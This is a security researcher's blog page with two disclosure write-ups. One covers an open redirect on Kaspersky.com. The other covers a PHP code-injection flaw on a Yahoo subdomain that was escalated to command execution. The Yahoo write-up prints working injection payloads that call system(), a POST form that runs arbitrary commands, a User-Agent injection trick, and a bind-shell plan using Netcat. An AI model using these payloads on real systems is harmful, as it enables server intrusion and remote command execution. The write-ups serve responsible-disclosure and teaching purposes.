Posts Tagged "zigoo"

Kaspersky.com Unvalidated Redirection Vulnerability.

Kaspersky.com Unvalidated Redirection Vulnerability.

10105.gif

Would you trust a link from your security vendor? Absolutely Yes! But imagine your security vendor is asking you to download a malware!

During my researches on Kaspersky.com I found “Unvalidated Redirection Vulnerability ” that could be used by attackers to trick Kaspersky.com users into visitng Malicious web-sites!

To demonstrate the impact of such vulnerabilities I made a video to simulate a black-hat method to use this vulnerability to spread a Malware.

Video POC:

The consequences of unfixing of such vulnerability are critical
  • Wide infection – since the redirection is coming from a trusted source especially if the attacker registered a domain name similar to Kaspersky.com
  • Very bad reputation for Kaspersky company.
  • Your most trusted resource “Your Antivirus” will be your worst enemy! Would you trust anything else!
And many other consequences. The vulnerability was reported to Kaspersky web-team and is now fixed.

Yahoo! Remote Command Execution Vulnerability.

Yahoo! Remote Command Execution Vulnerability.

Yahoo-Hacked
Hello Everyone,

This is my first writeup for the blog, which I choose to be about “Yahoo Remote Code Execution” Vulnerability.

The case started with a “Remote PHP Code Injection” vulnerability that later escalated to “Remote Command Execution”.

Vulnerability Link:

http://tw.user.mall.yahoo.com/rating/list?sid=$Vulnerability

Payload:

${@print(system(“whoami”))}

Note:

The server got many other Yahoo! sub-domains!

What is “Remote PHP Code Injection” ?

Simply, PHPCI occurs when user-supplied(GET/POST) values of the parameters are reflected inside eval() function, that vulnerability  allows attackers to execute PHP code such as system(“id”) or any other php function/code.

325673248_640

That said, I was able to inject PHP code by manuplating the value of the parameter “sid”.

In the beginning I tried to check the directories and files by “dir” using the SYSTEM function:
http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system(“dir”))}

gedo1

Indeed I need a better view!, so I tried with system(“ls -la”) But!?
It didn’t work! it does not accept any spaces in the url!!

what Actually I need a good proof of concept to explain to Yahoo! Security Team how dangerous is this vulnerability, despite the number of Yahoo! sub-domains hosted on the same server.
So I tried to bypass that issue by some tricks including URL ENCODING the space with %20 but it didn’t work. Same result with double URL encoding!

e.g. http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system(“ls%20-la”))}

I also tried to go arround by using the function file_get_contents(“http://sec-down.com/poc.txt”) but this one dosen’t work because of the folder permissions, did you say do it in /tmp ?!

I thought of:

1- uploading “bind.sh” which is a bind connection script, into /tmp directory

2- Execute it to make a bind connection with the server

.e.g http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system(“./tmp/bind.sh”))}

3- Receive the connection from the server on Netcat and now I will be free to run whatever Commands 😀

But actually Netcat is a Hacking tool! it also could be detected by any simple AV/IDS on the system! this could corrupt the whole thing!
I’ve to go for another solution.

Thanks to Ahmed Abul-Ela and Ibrahim Mosaad I was able to execute commands using system($_POST[‘x2’])

POC:

<form method=”POST” action=”http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system($_POST[‘x2’]))}“>
<input type=”text” name=”x2″>
<input type=”submit”></form>

Also by using  system($_SERVER[‘HTTP_USER_AGENT’]) and then inject my commands inside the userAgent.
.e.g http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system($_SERVER[‘HTTP_USER_AGENT’]))}

Yea I know there have been other good tricks such as using readfile(“/etc/passwd”) and many more, despite the adrenaline I had, but as you know those ideas never come to mind when you need it 😀

Sample POC for the Vulnerability [Allowed by Yahoo! to be public]:

TIMELINE:

Jan 20, 2014 at 6:39 PM – Intial Report to Yahoo! Security Team.

Jan 20, 2014 at 6:56 PM – Update 1 sent to Yahoo! that server kernel was old one with a well known “Local Privilage Esclation” vulnerability which means an attacker with such vulnerability can gain ROOT ACCESS to the server!!!!

Jan 21, 2014 at 6:44 PM – Yahoo! Acknowledged the vulnerability and pushed a Fix for it.

fixed

Thanks to Yahoo! Security team for the fast fix release.

BTW No news about the bounty yet!

Follow me: twitter.com/zigoo0